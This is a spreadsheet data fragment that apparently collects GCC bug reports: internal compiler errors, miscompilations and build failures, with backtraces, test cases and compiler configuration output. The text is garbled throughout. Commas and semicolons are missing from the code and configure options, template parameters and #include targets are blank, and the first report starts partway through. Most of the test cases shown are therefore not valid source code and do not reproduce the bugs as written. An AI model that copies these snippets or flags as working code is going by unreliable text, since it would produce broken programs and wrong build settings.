 int PhiPattern::produce(WhiteBoard &amp; event) {
     ^
0xd393ab build_int_cst_wide(tree_node* unsigned long long)
	../../gcc-trunk/gcc/tree.c:1217
0xd3990e double_int_to_tree(tree_node* double_int)
	../../gcc-trunk/gcc/tree.c:1067
0xd39dea build_int_cst(tree_node* long)
	../../gcc-trunk/gcc/tree.c:1044
0xbefd2b fold_relational_const(tree_code tree_node* tree_node* tree_node*) [clone .437619]
	../../gcc-trunk/gcc/fold-const.c:16163
0xb870b9 fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../../gcc-trunk/gcc/fold-const.c:9801
0xba8eef fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../../gcc-trunk/gcc/fold-const.c:14676
0xc9f217 fold_binary_op_with_conditional_arg(unsigned int tree_code tree_node* tree_node* tree_node* tree_node* tree_node* int) [clone .437722]
	../../gcc-trunk/gcc/fold-const.c:6011
0xb89fb4 fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../../gcc-trunk/gcc/fold-const.c:9887
0xa3d04a combine_cond_expr_cond
	../../gcc-trunk/gcc/tree-ssa-forwprop.c:367
0xa3d2c4 forward_propagate_into_comparison_1(gimple_statement_d* tree_code tree_node* tree_node* tree_node*) [clone .1031067]
	../../gcc-trunk/gcc/tree-ssa-forwprop.c:414
0x5fccc5 forward_propagate_into_cond
	../../gcc-trunk/gcc/tree-ssa-forwprop.c:562
0x5fccc5 ssa_forward_propagate_and_combine
	../../gcc-trunk/gcc/tree-ssa-forwprop.c:3012
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[innocent@vinavx0 Octave]$ c++ -std=gnu++11 -O3 -c PhiPattern.ii
[innocent@vinavx0 Octave]$ c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/afs/cern.ch/user/i/innocent/w2/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/afs/cern.ch/user/i/innocent/w2 --enable-languages=cc++ltofortran -enable-gold=yes --enable-lto --with-build-config=bootstrap-lto --with-gmp-lib=/usr/local/lib64 --with-mpfr-lib=/usr/local/lib64 -with-mpc-lib=/usr/local/lib64 --enable-cloog-backend=isl --with-cloog=/usr/local --with-ppl-lib=/usr/local/lib64 CFLAGS='-O2 -ftree-vectorize -fPIC' CXXFLAGS='-O2 -fPIC -ftree-vectorize -fvisibility-inlines-hidden -march=native' -enable-libitm -disable-multilib
Thread model: posix
gcc version 4.8.0 20121112 (experimental) [trunk revision 193427] (GCC) 
same with
bzip2 -d PhiPattern.ii.bz2 
pb-d-128-141-131-26:bugs48 innocent$ c++ -std=gnu++11 -O3 -c PhiPattern.ii
pb-d-128-141-131-26:bugs48 innocent$ c++ -std=gnu++11 -Ofast -c PhiPattern.ii
plugins/PhiPattern.cc: In member function â€˜virtual int PhiPattern::produce(WhiteBoard&amp;)â€™:
plugins/PhiPattern.cc:26:5: internal compiler error: in build_int_cst_wide at tree.c:1217
plugins/PhiPattern.cc:26:5: internal compiler error: Abort trap: 6
c++: internal compiler error: Abort trap: 6 (program cc1plus)
Abort trap: 6
pb-d-128-141-131-26:bugs48 innocent$ 
pb-d-128-141-131-26:bugs48 innocent$ 
pb-d-128-141-131-26:bugs48 innocent$ c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin12.2.0/4.8.0/lto-wrapper
Target: x86_64-apple-darwin12.2.0
Configured with: ./configure --enable-languages=cc++fortran --disable-multilib --disable-bootstrap --enable-lto -disable-libitm
Thread model: posix
gcc version 4.8.0 20121109 (experimental) [trunk revision 193360] (GCC)</t>
  </si>
  <si>
    <t>GCC-66950</t>
  </si>
  <si>
    <t>FAIL: libgomp.fortran/examples-4/simd-7.f90   -O0  execution test</t>
  </si>
  <si>
    <t>libgomp.fortran/examples-4/simd-7.f90 takes a very long time to
run on Linux/ia32.  I get random:
FAIL: libgomp.fortran/examples-4/simd-7.f90   -O0  execution test</t>
  </si>
  <si>
    <t>GCC-65729</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE (in prohibited_class_reg_set_mode_p at lra-constraints.c) on arm-linux-gnueabihf</t>
  </si>
  <si>
    <t>seen with r221867 on arm-linux-gnueabihf building the cgal and k3d packages.
$ g++ -c -g -O2 boolean.ii 
boolean.ii: In function '(static initializers for boolean.ii)':
boolean.ii:18:36: internal compiler error: in prohibited_class_reg_set_mode_p at lra-constraints.c:1659
 void fn1() { Interval_nt::m_fn1 }
                                    ^
0x58af03 prohibited_class_reg_set_mode_p
        ../../src/gcc/lra-constraints.c:1659
0x58da27 process_alt_operands
        ../../src/gcc/lra-constraints.c:2345
0x58f98f curr_insn_transform
        ../../src/gcc/lra-constraints.c:3464
0x5919e3 lra_constraints(bool)
        ../../src/gcc/lra-constraints.c:4442
0x585863 lra(_IO_FILE*)
        ../../src/gcc/lra.c:2315
0x5558c7 do_reload
        ../../src/gcc/ira.c:5418
0x5558c7 execute
        ../../src/gcc/ira.c:5589
Please submit a full bug report
with preprocessed source if appropriate.
$ cat boolean.ii
template  class Interval_nt {
  typedef Interval_nt IA
public:
  Interval_nt(double double) { b }
  static IA m_fn1() { IA(0 0) }
  struct Test_runtime_rounding_modes {
    Test_runtime_rounding_modes() {
      double x
      asm volatile( : +gw(x))
    }
  } static b
}
template 
typename Interval_nt::Test_runtime_rounding_modes
    Interval_nt::b
void fn1() { Interval_nt::m_fn1 }
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/arm-linux-gnueabihf/5/lto-wrapper
Target: arm-linux-gnueabihf
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 5-20150404-0ubuntu11' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=c++98 --enable-gnu-unique-object --disable-libitm --disable-libquadmath --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-armhf/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-armhf --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-armhf --with-arch-directory=arm --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --enable-multilib --disable-sjlj-exceptions --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb --disable-werror --enable-multilib --enable-checking=yes --build=arm-linux-gnueabihf --host=arm-linux-gnueabihf --target=arm-linux-gnueabihf
Thread model: posix
gcc version 5.0.0 20150404 (experimental) [trunk revision 221867] (Ubuntu 5-20150404-0ubuntu11)</t>
  </si>
  <si>
    <t>GCC-66652</t>
  </si>
  <si>
    <t>try_transform_to_exit_first_loop_alt generates incorrect loop</t>
  </si>
  <si>
    <t>This testcase fails on trunk:
...
$ cat libgomp/testsuite/libgomp.c/parloops-exit-first-loop-alt-5.c
/* { dg-do run } */
/* { dg-options -O2 -ftree-parallelize-loops=2 } */
#include 
#include 
#include 
unsigned int
__attribute__((noclonenoinline))
f (unsigned int n unsigned int sum)
{
  unsigned int i
  i = UINT_MAX
  do
    {
      sum += i % 13
      i++
    }
  while (i &lt; n - 1)
  return sum
}
int
main (void)
{
  unsigned int actual = f (0 12)
  unsigned int expected = 4294967290
  if (actual != expected)
    abort ()
  return 0
}
...
try_transform_to_exit_first_loop_alt changes the loop into this and the loop is never entered:
...
  i = UINT_MAX
  while (i &lt; n)
    {
      sum += i % 13
      i++
    }
...</t>
  </si>
  <si>
    <t>GCC-7772</t>
  </si>
  <si>
    <t>Errors while building openH323</t>
  </si>
  <si>
    <t>I am getting this error message after doing the commando
gmake opt in point 3 of the guide on how to build the OpenH323-libraries (http://www.openh323.org/build.html):
[root@vriompeis openh323]# gmake opt
set -e gmake -C src opt gmake -C samples/simple opt
gmake[1]: Entering directory `/home/openh323/src'
g++ -Wall -DP_LINUX -D_REENTRANT -DP_HAS_SEMAPHORES -fPIC -DP_SSL -I/usr/include/include -I/usr/include/crypto -DP_PTHREADS -DPHAS_TEMPLATES -DPBYTE_ORDER=PLITTLE_ENDIAN -I/home/pwlib/include/ptlib/unix -DPTRACING -I/home/openh323/include -DHAS_IXJ -DHAS_OSS -DPTRACING -I/home/pwlib/include -O3 -DNDEBUG  -c h225_1.cxx
-o /home/openh323/lib/obj_linux_x86_r/h225_1.o
eth0: media is TP.
VM: killing process cc1plus
g++: Internal error: Killed (program cc1plus)
Please submit a full bug report.
See  for instructions.
gmake[1]: *** [/home/openh323/lib/obj_linux_x86_r/h225_1.o] Error 1
gmake[1]: Leaving directory `/home/openh323/src'
gmake: *** [opt] Error 2
Release:
GNU Make 3.79.1
Environment:
Red Hat Linux 7.0. Kernel:2.2.16-22 Pentium Pro 200 MHz Total memmory: 62996 KB Shared memory: 34820 KB Total swap space: 161272 KB
How-To-Repeat:
Download the pwlib and openh323-libraries from http://www.openh323.org/code.html and follow the instructions on http://www.openh323.org/build.html.</t>
  </si>
  <si>
    <t>thomas.tomter</t>
  </si>
  <si>
    <t>GCC-57139</t>
  </si>
  <si>
    <t>std::tuple conversion constructor does the wrong checks</t>
  </si>
  <si>
    <t>As per Std 20.4.2.1/14 the template  tuple(const tuple&amp; u) constructor should require is_constructible. However the implementation checks is_convertible which implies copy constructibility requirement for destination types. As a result:
#include 
#include 
class A {  }
class B { public: B( A const  }
static_assert( std::is_constructible&lt; B A const  // OK
static_assert( std::is_convertible::value test ) // fail
static_assert( std::is_constructible std::tuple &gt;::value test ) // fail</t>
  </si>
  <si>
    <t>vpozdyayev</t>
  </si>
  <si>
    <t>GCC-2931</t>
  </si>
  <si>
    <t>Link errors (undef. __gxx_personality_v0) during libstdc++-v3/configure</t>
  </si>
  <si>
    <t>During libstdc++-v3/configure many tests fail (i.e. strtoll strtoull llabs lldiv atoll lldiv_t wcstoll wcstoull)
due to a link error (undefined reference to `__gxx_personality_v0') and the support for long long ends up being (wrongly) disabled.
For example:
configure:3183: checking for strtoll
configure:3214: /home/paolo/Gcc-Test/gcc-build-20010521/gcc/xgcc -B/home/paolo/Gcc-Test/gcc-build-20010521/gcc/ -nostdinc++  -L/home/paolo/Gcc-Test/gcc-build-20010521/i686-pc-linux-gnu/libstdc++-v3/src -L/home/paolo/Gcc-Test/gcc-build-20010521/i686-pc-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/gcc/i686-pc-linux-gnu/bin/ -B/usr/local/gcc/i686-pc-linux-gnu/lib/ -isystem /usr/local/gcc/i686-pc-linux-gnu/include -o conftest -g -O2 -fvtable-thunks -D_GNU_SOURCE   conftest.C  1&gt;&amp;5
cc1plus: warning: -fvtable-thunks is no longer supported
/tmp/ccwmt8Jq.o: In function `main':
/home/paolo/Gcc-Test/gcc-build-20010521/i686-pc-linux-gnu/libstdc++-v3/configure:3211: undefined reference to `__gxx_personality_v0'
collect2: ld returned 1 exit status
configure: failed program was:
#line 3188 configure
#include confdefs.h
/* System header to define __stub macros and hopefully few prototypes
    which can conflict with char strtoll() below.  */
#include 
/* Override any gcc2 internal prototype to avoid an error.  */
#ifdef __cplusplus
extern C
#endif
/* We use char because int might match the return type of a gcc2
    builtin and then its argument prototype would still apply.  */
char strtoll()
int main() {
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS.  Some functions are actually named
    something starting with __ and the normal name is an alias.  */
#if defined (__stub_strtoll) || defined (__stub___strtoll)
choke me
#else
strtoll()
#endif
 return 0 }
Release:
gcc-20010521
Environment:
i686-linux2.4.4-glibc2.2.3-binutils2.11
No special settings in configure beyond a --prefix=/usr/local/gcc.
How-To-Repeat:
gcc-2001514 positively checks for those functions.</t>
  </si>
  <si>
    <t>GCC-5917</t>
  </si>
  <si>
    <t>[hpux 11.0 64bit] Building gcc-3.0.4 (bootstrap) using gcc-3.0.2/64 and binutils-2.12 fails</t>
  </si>
  <si>
    <t>I configure using this script:
--8&lt;--- Conf-gcc64
#!/usr/bin/sh
export CONFIG_SITE=
export CC=gcc64
export PATH=.:/wrk/pa20_64/bin:/wrk/gcc-3.0.1-64/bin:/u/usr/merijn/bin/private:/u/usr/merijn/bin:/pro/local/bin:/pro/bin:/usr/hosts:/usr/bin:/usr/dt/bin:/usr/bin/X11:/opt/ansic/bin:/usr/sbin:/etc:/sbin:/usr/lib:/usr/ccs/bin:/usr/contrib/bin:/opt/nettladm/bin:/opt/fc/bin:/opt/fcms/bin:/opt/upgrade/bin:/opt/pd/bin:/usr/contrib/bin/X11:/opt/java/bin:/opt/hparray/bin:/opt/resmon/bin:/opt/pred/bin:/opt/langtools/bin:/opt/perf/bin:/opt/imake/bin:/opt/hpnp/bin:/opt/xftp/bin/X11:/usr/sbin/stm/uut/bin/progs:/pro/tu/bin:/pro/local/MySQL/bin
rm -rf obj
mkdir obj
cd obj
../src/configure \
    --enable-languages=gcc \
    --prefix=/wrk/gcc-3.0.4-64 --with-local-prefix=/wrk/gcc-3.0.4-64 \
    --with-gnu-as --with-as=/wrk/pa20_64/bin/as \
    --with-gnu-ld --with-ld=/wrk/gcc-3.0.1-64/bin/ld \
    --disable-shared \
    --disable-nls
--&gt;8---
and then build with this script:
--8&lt;--- Build-gcc64
#!/usr/bin/sh
export CONFIG_SITE=
export CC=gcc64
export PATH=.:/wrk/pa20_64/bin:/wrk/gcc-3.0.1-64/bin:/u/usr/merijn/bin/private:/u/usr/merijn/bin:/pro/local/bin:/pro/bin:/usr/hosts:/usr/bin:/usr/dt/bin:/usr/bin/X11:/opt/ansic/bin:/usr/sbin:/etc:/sbin:/usr/lib:/usr/ccs/bin:/usr/contrib/bin:/opt/nettladm/bin:/opt/fc/bin:/opt/fcms/bin:/opt/upgrade/bin:/opt/pd/bin:/usr/contrib/bin/X11:/opt/java/bin:/opt/hparray/bin:/opt/resmon/bin:/opt/pred/bin:/opt/langtools/bin:/opt/perf/bin:/opt/imake/bin:/opt/hpnp/bin:/opt/xftp/bin/X11:/usr/sbin/stm/uut/bin/progs:/pro/tu/bin:/pro/local/MySQL/bin
cd obj
make CFLAGS='-O2 -mpa-risc-2-0' \
     LIBCFLAGS='-O2 -mpa-risc-2-0' \
     LIBCXXFLAGS='-O2 -mpa-risc-2-0 -fno-implicit-templates' \
     bootstrap-lean
--&gt;8---
where /wrk/pa20_64 contains the latest (working) 64bit binaries for
  gcc-3.0.2
  binutils-2.12 (ld was stated to be unsupported on HP-UX and is
                 not available on /wrk/pa20_64 but on /wrk/gcc-3.0.1-64/bin
                 I can find
    # /wrk/gcc-3.0.1-64/bin/ld --version
    GNU ld 2.11.90
    Copyright 2001 Free Software Foundation Inc.
    This program is free software you may redistribute it under the terms of
    the GNU General Public License.  This program has absolutely no warranty.
      Supported emulations:
       elf64hppa
./xgcc -B./ -B/wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/bin/ -isystem /wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/include -isystem /wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/sys-include -O2   -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/config -I../../src/gcc/../include -c quadlib.c -o libgcc/./quadlib.o
quadlib.c:35: warning: no previous prototype for `_U_Qfeq'
quadlib.c:41: warning: no previous prototype for `_U_Qfne'
quadlib.c:47: warning: no previous prototype for `_U_Qfgt'
quadlib.c:53: warning: no previous prototype for `_U_Qfge'
quadlib.c:59: warning: no previous prototype for `_U_Qflt'
quadlib.c:65: warning: no previous prototype for `_U_Qfle'
quadlib.c:71: warning: no previous prototype for `_U_Qfcomp'
quadlib.c:81: warning: no previous prototype for `_U_Qfneg'
quadlib.c:100: warning: no previous prototype for `_U_Qfcnvfxt_quad_to_usgl'
./xgcc -B./ -B/wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/bin/ -isystem /wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/include -isystem /wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/sys-include -O2   -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/config -I../../src/gcc/../include -fexceptions -c ../../src/gcc/unwind-dw2.c -o libgcc/./unwind-dw2.o
../../src/gcc/unwind-pe.h:61: warning: `size_of_encoded_value' defined but not used
./xgcc -B./ -B/wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/bin/ -isystem /wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/include -isystem /wrk/gcc-3.0.4-64/hppa2.0w-hp-hpux11.00/sys-include -O2   -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/config -I../../src/gcc/../include -fexceptions -c ../../src/gcc/unwind-dw2-fde.c -o libgcc/./unwind-dw2-fde.o
../../src/gcc/unwind-dw2-fde.c:844: Internal compiler error in grokdeclarator at c-decl.c:3886
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./unwind-dw2-fde.o] Error 1
make[3]: Leaving directory `/pro/3gl/GNU/gcc-3.0.4/obj/gcc'
make[2]: *** [libgcc.a] Error 2
make[2]: Leaving directory `/pro/3gl/GNU/gcc-3.0.4/obj/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/pro/3gl/GNU/gcc-3.0.4/obj/gcc'
make: *** [bootstrap-lean] Error 2
a5:/pro/3gl/GNU/gcc-3.0.4 243 &gt;
Release:
3.0.4
Environment:
HP-UX a5 B.11.00 U 9000/800 512770508 unlimited-user license
host: hppa2.0w-hp-hpux11.00
build: hppa2.0w-hp-hpux11.00
target: hppa2.0w-hp-hpux11.00
configured with: ../src/configure --enable-languages=gcc --prefix=/pro/local --with-local-prefix=/pro/local --without-gnu-as --without-gnu-ld --disable-shared --disable-nls
How-To-Repeat:
# Build-gcc64</t>
  </si>
  <si>
    <t>GCC-14520</t>
  </si>
  <si>
    <t>[3.3 only] fixincludes mishandles comment containing #include in stdlib.h</t>
  </si>
  <si>
    <t>I have installed system headers for an embedded system in $PREFIX/sys-includes.
As per some local coding standards they include a proforma that includes this
at the top of the header:
// Usage:         #include 
However fixincludes fixes the header to replace this with:
// Usage:#ifdef BOGUS_RECURSION
         #include 
#endif
Clearly this fix itself is bogus and causes a bogus recursion where previously
there was none! 
The offending fix in fixinc/inclhack.def was removed from GCC mainline in
January 2003. See the change at line 1805 here:
http://gcc.gnu.org/cgi-bin/cvsweb.cgi/gcc/gcc/fixinc/inclhack.def.diff?r1=1.139&amp;r2=1.140&amp;f=h
I will be using the gcc 3.x branch with some (yet to be announced but eventually
public) improvements to eCos  and I would prefer
to avoid any unnecessary patches so I would appreciate if this change could
also be back-applied to the 3.3 branch in time for 3.3.4.
If it isn't acceptable to obsolete this fix (even though it is clearly
obsolete) it can be corrected by anchoring to the start of line like so:
    select   = ^[ \t]*#include .*	 
I note that many other fixinc fixes use regexps for #includes that also don't
anchor to the start of line. Perhaps they should?</t>
  </si>
  <si>
    <t>GCC-65298</t>
  </si>
  <si>
    <t>[5 Regression] lto1: ICE: in operator[] at vec.h:736 during LTO/PGO Firefox build</t>
  </si>
  <si>
    <t>On x86_64 I get during final libxul lto WPA phase (-fprofile-use):
lto1: internal compiler error: in operator[] at vec.h:736
0xffc277 vec::operator[](unsigned int)
        ../../gcc/gcc/vec.h:736
0xffd678 vec::operator[](unsigned int)
        ../../gcc/gcc/vec.h:1184
0xffd678 vec::operator[](unsigned int)
        ../../gcc/gcc/vec.h:1202
0xffd678 ipa_value_from_jfunc(ipa_node_params* ipa_jump_func*)
        ../../gcc/gcc/ipa-cp.c:937
0x87b5ae evaluate_properties_for_edge
        ../../gcc/gcc/ipa-inline-analysis.c:950
0x87bd9b do_estimate_edge_time(cgraph_edge*)
        ../../gcc/gcc/ipa-inline-analysis.c:3747
0x100e03e estimate_edge_time
        ../../gcc/gcc/ipa-inline.h:313
0x100e03e can_inline_edge_p
        ../../gcc/gcc/ipa-inline.c:503
0x100e498 speculation_useful_p(cgraph_edge* bool)
        ../../gcc/gcc/ipa-inline.c:1592
0x101b34e clone_inlined_nodes(cgraph_edge* bool bool int* int)
        ../../gcc/gcc/ipa-inline-transform.c:256
0x101b7fe inline_call(cgraph_edge* bool vec* int* bool bool*)
        ../../gcc/gcc/ipa-inline-transform.c:345
0x10140ed inline_small_functions
        ../../gcc/gcc/ipa-inline.c:1932
0x1014dba ipa_inline
        ../../gcc/gcc/ipa-inline.c:2320
0x1014dba execute
        ../../gcc/gcc/ipa-inline.c:2726
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: /var/tmp/gcc_test/usr/local/bin/g++ returned 1 exit status
CXXFLAGS=-march=native -fno-semantic-interposition -flto=4 -fdevirtualize-at-ltrans -fprofile-use -fprofile-correction -ffunction-sections -fdata-sections</t>
  </si>
  <si>
    <t>GCC-18741</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE tree check: expected class 'expression' have 'declaration' (var_decl)</t>
  </si>
  <si>
    <t>public class bla {
        public static void main(String[] a) {
                int x = 2
                byte [] buffer = new byte [(int)x]
        }
}
gcc version 4.0.0 20041130 (experimental)
gcj -c bla.java
bla.java: In class 'bla':
bla.java: In method 'bla.main(java.lang.String[])':
bla.java:5: internal compiler error: tree check: expected class 'expression'
have 'declaration' (var_decl) in annotate_with_file_line at tree.c:2871
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-65734</t>
  </si>
  <si>
    <t>Yet another case of lost alignment by stor_layout</t>
  </si>
  <si>
    <t>template 
struct BVector
{
  typedef T T2
    typedef T value_type [[gnu::aligned(8)]]    // { dg-bogus attribute attribute }
    typedef T2 value_type2 [[gnu::aligned(8)]]  // { dg-bogus attribute attribute }
  value_type v
}
BVector m
template  class T&gt;
struct BV2
{
    typedef T value_type [[gnu::aligned(16)]] // { dg-bogus attribute attribute }
  value_type v
}
BV2 m2
int
main()
{
  if (__alignof__ (BV2::value_type) != 16)
    __builtin_abort ()
}
$ /aux/hubicka/trunk-install/bin/gcc  -O2 a.C -std=gnu++11
$ ./a.out
Aborted
$ /aux/hubicka/llvm2-install/bin/clang  -O2 a.C -std=gnu++11
$ ./a.out
$ 
I think we have problem with re-layouting the type here.</t>
  </si>
  <si>
    <t>GCC-29061</t>
  </si>
  <si>
    <t>nternal compiler error: in make_class_data at java/class.c:1774</t>
  </si>
  <si>
    <t>testserver.java in Jessie 1.0.1.
cmmand : gcj -v -c -o testserver.o testserver.java
Using built-in specs.
Reading specs from /usr/lib/gcc/i586-suse-linux/4.1.0/../../../libgcj.spec
rename spec lib to liborig
Target: i586-suse-linux
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --libexecdir=/usr/lib --enable-languages=cc++objcfortranjavaada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0 --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind --with-cpu=generic --host=i586-suse-linux
Thread model: posix
gcc version 4.1.0 (SUSE Linux)
 /usr/lib/gcc/i586-suse-linux/4.1.0/jc1 testserver.java -fhash-synchronization -fno-use-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -fkeep-inline-functions -quiet -dumpbase testserver.java -mtune=generic -auxbase-strip testserver.o -g1 -version -o /tmp/ccZeNZmX.s
GNU Java version 4.1.0 (SUSE Linux) (i586-suse-linux)
        compiled by GNU C version 4.1.0 (SUSE Linux).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64554
Class path starts here:
    /usr/local/classpath/share/classpath/glibj.zip/ (zip)
    /usr/share/java/libgcj-4.1.0.jar/ (system) (zip)
testserver.java:9: internal compiler error: in make_class_data at java/class.c:1774
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-30793</t>
  </si>
  <si>
    <t>Segfault on calling a function returning a pointer</t>
  </si>
  <si>
    <t>The attached code generates a segfault with no apparent reason. 
[sfilippo@localhost NEMO]$ gfortran -v 
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.2-20070207/configure --prefix=/usr/local/gcc42 --with-mpfr=/home/travel/GCC/BUILDS/mpfr --with-gmp-lib=/home/travel/GCC/BUILDS/gmp/lib/ --with-gmp=/home/travel/GCC/BUILDS/gmp
Thread model: posix
gcc version 4.2.0 20070207 (prerelease)
[sfilippo@localhost NEMO]$ gfortran -o test_pnt test_pnt.f90
[sfilippo@localhost NEMO]$ ./test_pnt
Segmentation fault</t>
  </si>
  <si>
    <t>GCC-20277</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] -mcpu=power4 vs. -maltivec</t>
  </si>
  <si>
    <t>Since 3.4.x you can't use both -mcpu=power4 and -maltivec on ppc targets. This
is critical that it's fixed before 4.0 as the linux kernel will rely on this.
It's currently using -mcpu=970 as a workaround since it has one file using
-maltivec (the RAID6 code) but this workaround isn't suitable for 4.0 due to
implicit generation of vector code.</t>
  </si>
  <si>
    <t>GCC-23841</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Floating-point literals cast to integral types should be accepted in integer constant expressions</t>
  </si>
  <si>
    <t>template 
struct S
{
  int f(int i = I) { return i }
}
void
g ()
{
  S a2
}
is valid code - floating-point literals immediately cast to integral types are
valid in integral constant expressions - but GCC (4.0/4.1) wrongly rejects it
with -ansi -pedantic-errors.
Mark has asked for this bug to be assigned to him.</t>
  </si>
  <si>
    <t>GCC-43370</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] ICE gen_type_die_with_usage at dwarf2out.c:14745</t>
  </si>
  <si>
    <t>Using gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu9) 
Target: x86_64-linux-gnu
g++ -c -g -Wall -W  -o NcBaseEncoderSse2.o -save-temps NcBaseEncoderSse2.ii
../../codecs/nc/sse2/NcBaseEncoderSse2.cpp: In member function â€˜virtual unsigned int NcBaseEncoderSse2::fragile_block(unsigned int const int16*)â€™:
../../codecs/nc/sse2/NcBaseEncoderSse2.cpp:351: internal compiler error: in gen_type_die_with_usage at dwarf2out.c:14745</t>
  </si>
  <si>
    <t>greggyh</t>
  </si>
  <si>
    <t>GCC-52326</t>
  </si>
  <si>
    <t>[4.6 Regression] float result incorrect with -O1 and calling external function.</t>
  </si>
  <si>
    <t>Created attachment 26713
Two source files one header file and a Makefile
The sample program attached fails when built with -O1 but not with any other optimization levels (023). Unfortunately it only fails when we call an external function therefore we had to attach a tgz file instead of a preprocessed file. 
The tar file contains four files: main.c foo.c foo.h and a Makefile. The  Makefile which builds two targets (fail and success) can be used to re-create the problem as well as to build a non-failing version. 
Also the error only occurs when certain other conditions are met. We've written a C comment for every condition we found in the source file named main.c. Please search for the text NOTE. 
GCC Version:
------------
Our GCC version is 4.6.2. It fails on multiple versions/builds of 4.6.2 both the one provided with Gentoo and the one provided by Centos 6. The info below is from my Gentoo host:
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.2/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.2/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.6.2/work/gcc-4.6.2/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.2 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.2/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.2 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.2/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.2/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.2/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.6.2/python --enable-checking=release --disable-libgcj --disable-libquadmath --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-targets=all --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.6.2 p1.4 pie-0.5.0'
Thread model: posix
